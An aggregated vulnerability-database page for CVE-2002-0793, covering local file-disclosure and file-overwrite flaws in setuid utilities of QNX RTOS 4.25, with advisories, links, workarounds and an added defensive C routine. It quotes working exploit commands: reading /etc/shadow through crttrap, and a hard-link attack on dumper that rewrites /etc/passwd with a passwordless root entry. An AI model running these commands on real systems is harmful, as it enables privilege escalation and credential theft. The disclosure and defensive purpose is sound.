CVE-2002-0793
CVSS4.6
Published: 2002-08-12 00:00:00
Revised: 2008-09-05 16:28:57
NMCOES    

[Original] Hard link and possibly symbolic link following vulnerabilities in QNX RTOS 4.25 (aka QNX4) allow local users to overwrite arbitrary files via (1) the -f argument to the monitor utility, (2) the -d argument to dumper, (3) the -c argument to crttrap, or (4) using the Watcom sample utility.


[CNNVD] QNX RTOS CRTTrap file disclosure vulnerability (CNNVD-200208-050)

        
        QNX RTOS is an embedded, flexibly configurable real-time operating system.
        The 'crttrap' utility in QNX RTOS contains a vulnerability that lets a local attacker read the contents of arbitrary system files.
        'crttrap' in QNX RTOS is installed setuid root by default and accepts a -c command-line argument naming a configuration file. Because it applies no proper access control to the file it is asked to read, a local attacker can pass the -c argument to read arbitrary sensitive files on the system, including /etc/shadow.
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0793
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-050
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/4902
(VENDOR_ADVISORY)  BID  4902
http://www.iss.net/security_center/static/9231.php
(VENDOR_ADVISORY)  XF  qnx-rtos-monitor-f(9231)
http://xforce.iss.net/xforce/xfdb/9234
(UNKNOWN)  XF  qnx-rtos-dumper-symlink(9234)
http://xforce.iss.net/xforce/xfdb/9233
(UNKNOWN)  XF  qnx-rtos-watcom-sample(9233)
http://xforce.iss.net/xforce/xfdb/9232
(UNKNOWN)  XF  qnx-rtos-crttrap-c(9232)
http://www.securityfocus.com/bid/4904
(UNKNOWN)  BID  4904
http://www.securityfocus.com/bid/4903
(UNKNOWN)  BID  4903
http://www.securityfocus.com/bid/4901
(UNKNOWN)  BID  4901
http://archives.neohapsis.com/archives/bugtraq/2002-05/0292.html
(VENDOR_ADVISORY)  BUGTRAQ  20020531 Multiple vulnerabilities in QNX

- Vulnerability information

QNX RTOS CRTTrap file disclosure vulnerability
Medium severity  Access validation error
2002-08-12 00:00:00 2005-10-20 00:00:00
Local
        
        QNX RTOS is an embedded, flexibly configurable real-time operating system.
        The 'crttrap' utility in QNX RTOS contains a vulnerability that lets a local attacker read the contents of arbitrary system files.
        'crttrap' in QNX RTOS is installed setuid root by default and accepts a -c command-line argument naming a configuration file. Because it applies no proper access control to the file it is asked to read, a local attacker can pass the -c argument to read arbitrary sensitive files on the system, including /etc/shadow.
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Use chmod a-s to remove the setuid bit from the 'crttrap' program.
        Vendor patch:
        QNX
        ---
        The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:
        
        http://www.qnx.com/

- Vulnerability information (21499)

QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability (EDBID:21499)
linux local
2002-05-31 Verified
0 Simon Ouellette
N/A
source: http://www.securityfocus.com/bid/4901/info

The QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. Local attackers may specify an arbitrary system file in place of the configuration file, and crttrap will disclose the contents of that file.

crttrap -c /etc/shadow 		

- Vulnerability information (21500)

QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability (EDBID:21500)
linux local
2002-05-31 Verified
0 Simon Ouellette
N/A
source: http://www.securityfocus.com/bid/4902/info

The QNX RTOS monitor utility is prone to an issue which may allow local attackers to modify arbitrary system files (such as /etc/passwd). monitor is installed setuid root by default.

The monitor -f command line option may be used by a local attacker to cause an arbitrary system file to be overwritten. Once overwritten, the attacker will gain ownership of the file.

monitor -f /etc/passwd 		

- Vulnerability information (21501)

QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability (EDBID:21501)
linux local
2002-05-31 Verified
0 Simon Ouellette
N/A
source: http://www.securityfocus.com/bid/4904/info

When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. 

Example exploit, with /bin/dumper:

Let EVIL be the unprivileged user who wants to gain root access.

#link to the passwd file: dumper dumps to [process name].dmp
$ ln /etc/passwd /home/EVIL/ksh.dmp
#call the program that will attempt to write to the hard link
$ dumper -d /home/EVIL -p [PID of EVIL's ksh]
#have dumper do its job by terminating the monitored process
$ exit
#at this point, /etc/passwd is overwritten by the binary dump, and more importantly: EVIL is now the owner!
$ echo root::0:0::///:/bin/sh > /etc/passwd
#but now no login works because /etc/passwd is not owned by userid 0. So you do:

$ passwd

#and change your password. This gives /etc/passwd ownership back to root, keeping the modifications you have made.

$ su
#
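The three records on this page (dumper -d, monitor -f, crttrap -c) share one root cause: a setuid root utility creates or opens a file at a path the unprivileged user controls, follows whatever hard link or symlink is already sitting there, and then hands ownership of the result to that user. The defensive pattern is to insist on creating a brand-new file (O_CREAT|O_EXCL|O_NOFOLLOW), to verify the descriptor rather than the path, and to change ownership with fchown() on that descriptor only. The C routine below is an added example written for this page, not QNX's code or anything from the original advisory; safe_create_dump and run_scenario are hypothetical names, the /tmp fixture and the stand-in passwd line are constructed, and it assumes a POSIX system with openat() and O_NOFOLLOW (Linux or a modern QNX; the page does not say what the 2002 QNX4 libc offered). run_scenario rebuilds the page's hard link and symlink setup in a throwaway directory and returns 0 when both planted links are refused, the target file is untouched, and a legitimate dump is still written.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Close fd (if open), set errno and return -1; keeps the checks below short. */
static int fail(int fd, int err)
{
    if (fd >= 0)
        close(fd);
    errno = err;
    return -1;
}

/* Create a brand-new dump file `name` inside `dir` and hand it to `owner`.
 * Returns a writable fd, or -1 with errno set when the name already exists
 * (a planted hard link or symlink), is not a plain file, or has extra links.
 * Hypothetical helper written for this page, not a QNX API. */
int safe_create_dump(const char *dir, const char *name, uid_t owner, gid_t group)
{
    /* The dump name comes from the process name; a slash would let it escape
     * the dump directory, so refuse it outright. */
    if (name[0] == '\0' || strchr(name, '/') != NULL)
        return fail(-1, EINVAL);
    /* Open the directory itself without following a symlink in its place. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    /* O_EXCL makes the kernel fail unless this very call creates the entry, so
     * a pre-planted hard link or symlink (even a dangling one) is never opened.
     * O_NOFOLLOW is belt and braces; mode 0600 keeps a memory dump private. */
    int fd = openat(dfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0600);
    int saved = errno;
    close(dfd);
    if (fd < 0)
        return fail(-1, saved);
    /* Defence in depth on the descriptor we hold, never on the path again:
     * it must be a fresh regular file with exactly one link. */
    struct stat st;
    if (fstat(fd, &st) != 0)
        return fail(fd, errno);
    if (!S_ISREG(st.st_mode) || st.st_nlink != 1)
        return fail(fd, EEXIST);
    /* Only now give the crashed process's user the file, and via fchown() on
     * the descriptor: chown() on a path could be redirected in the meantime. */
    if (fchown(fd, owner, group) != 0)
        return fail(fd, errno);
    return fd;
}

/* Rebuild the page's scenario in a throwaway directory (constructed fixture):
 * a hard link and a symlink planted under the names dumper would use, plus one
 * clean name. Returns 0 when both links are refused, the target file is
 * untouched and the clean dump is written; otherwise a bit mask of failures. */
int run_scenario(void)
{
    char dir[] = "/tmp/dumpdemo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 1;
    char target[256], hard[256], sym[256], fresh[256];
    snprintf(target, sizeof target, "%s/passwd", dir);
    snprintf(hard, sizeof hard, "%s/ksh.dmp", dir);
    snprintf(sym, sizeof sym, "%s/sh.dmp", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.dmp", dir);
    const char *original = "root:x:0:0:root:/:/bin/sh\n"; /* constructed stand-in */
    FILE *f = fopen(target, "w");
    if (f == NULL)
        return 2;
    fputs(original, f);
    fclose(f);
    if (link(target, hard) != 0 || symlink(target, sym) != 0)
        return 3;
    int code = 0;
    if (safe_create_dump(dir, "ksh.dmp", getuid(), getgid()) != -1 || errno != EEXIST)
        code |= 4;  /* hard link was followed */
    if (safe_create_dump(dir, "sh.dmp", getuid(), getgid()) != -1 || errno != EEXIST)
        code |= 8;  /* symlink was followed */
    int fd = safe_create_dump(dir, "fresh.dmp", getuid(), getgid());
    if (fd < 0 || write(fd, "dump", 4) != 4)
        code |= 16; /* legitimate dump could not be written */
    if (fd >= 0)
        close(fd);
    char buf[64] = {0};
    if ((f = fopen(target, "r")) != NULL) {
        buf[fread(buf, 1, sizeof buf - 1, f)] = '\0';
        fclose(f);
    }
    if (strcmp(buf, original) != 0)
        code |= 32; /* the "sensitive" file was modified */
    unlink(hard); unlink(sym); unlink(target); unlink(fresh);
    rmdir(dir);
    return code;
}

int main(void)
{
    int rc = run_scenario();
    printf("scenario result: %d (0 = every check held)\n", rc);
    return rc == 0 ? 0 : 1;
}
```

The same principle covers the read side of the crttrap -c record: a setuid program that opens a user-named file should do so with the invoking user's privileges (or refuse paths it did not create) rather than trusting root's unrestricted access, and the CNNVD workaround of clearing the setuid bit removes the privilege gap entirely when the utility is not needed.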

- Vulnerability information

12215
QNX RTOS monitor -f Argument Arbitrary File Manipulation
Local Access Required Other
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-05-31 Unknown
2002-05-31 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

QNX RTOS dumper Arbitrary File Modification Vulnerability
Access Validation Error 4904
No Yes
2002-05-31 12:00:00 2009-07-11 01:56:00
Credited to Simon Ouellette <einherj@hotmail.com>.

- Affected program versions

QNX RTOS 4.25
QNX RTOS 6.1

- Unaffected program versions

QNX RTOS 6.1

- Vulnerability discussion

When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'.

- Exploit

The following demonstration was provided by: "Simon Ouellette" <einherj@hotmail.com>

Example exploit, with /bin/dumper:

Let EVIL be the unprivileged user who wants to gain root access.

#link to the passwd file: dumper dumps to [process name].dmp
$ ln /etc/passwd /home/EVIL/ksh.dmp
#call the program that will attempt to write to the hard link
$ dumper -d /home/EVIL -p [PID of EVIL's ksh]
#have dumper do its job by terminating the monitored process
$ exit
#at this point, /etc/passwd is overwritten by the binary dump, and more importantly: EVIL is now the owner!
$ echo root::0:0::///:/bin/sh > /etc/passwd
#but now no login works because /etc/passwd is not owned by userid 0. So you do:

$ passwd

#and change your password. This gives /etc/passwd ownership back to root, keeping the modifications you have made.

$ su
#

- Solution

The vendor has reported this vulnerability as being fixed in version 6.1.0.


QNX RTOS 4.25

- References

 

 
